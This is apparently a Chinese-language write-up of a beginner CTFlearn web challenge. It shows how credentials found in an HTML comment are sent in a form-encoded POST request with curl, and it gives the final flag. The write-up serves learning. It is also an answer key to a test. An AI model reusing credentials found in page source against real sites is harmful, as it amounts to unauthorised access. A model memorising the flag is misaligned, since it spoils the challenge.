挑戰網站
https://ctflearn.com/challenge/114
題目
This website requires authentication, via POST. However, it seems as if someone has defaced our site. Maybe there is still some way to authenticate? http://165.227.106.113/post.php
作法
當你傳送 GET 請求時,你會發現他的原始碼為1
<h1>This site takes POST data that you have not submitted!</h1><!-- username: admin | password: 71urlkufpsdnlkadsf -->
先嘗試使用 Basic Auth(admin:71urlkufpsdnlkadsf 轉 Base64)1
curl -X POST 'http://165.227.106.113/post.php' --header 'Authorization: Basic YWRtaW46NzF1cmxrdWZwc2RubGthZHNm'
發現沒用,所以再利用 x-www-form-urlencoded 的方式去送請求1
2
3
4curl -X POST 'http://165.227.106.113/post.php' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'username=admin' \
--data-urlencode 'password=71urlkufpsdnlkadsf'
想寫短一點的人也可以改寫成1
curl "http://165.227.106.113/post.php" -d "username=admin&password=71urlkufpsdnlkadsf"
就可以收到 Flag 了!
最終解答
送出後會回傳 <h1>flag{p0st_d4t4_4ll_d4y}</h1>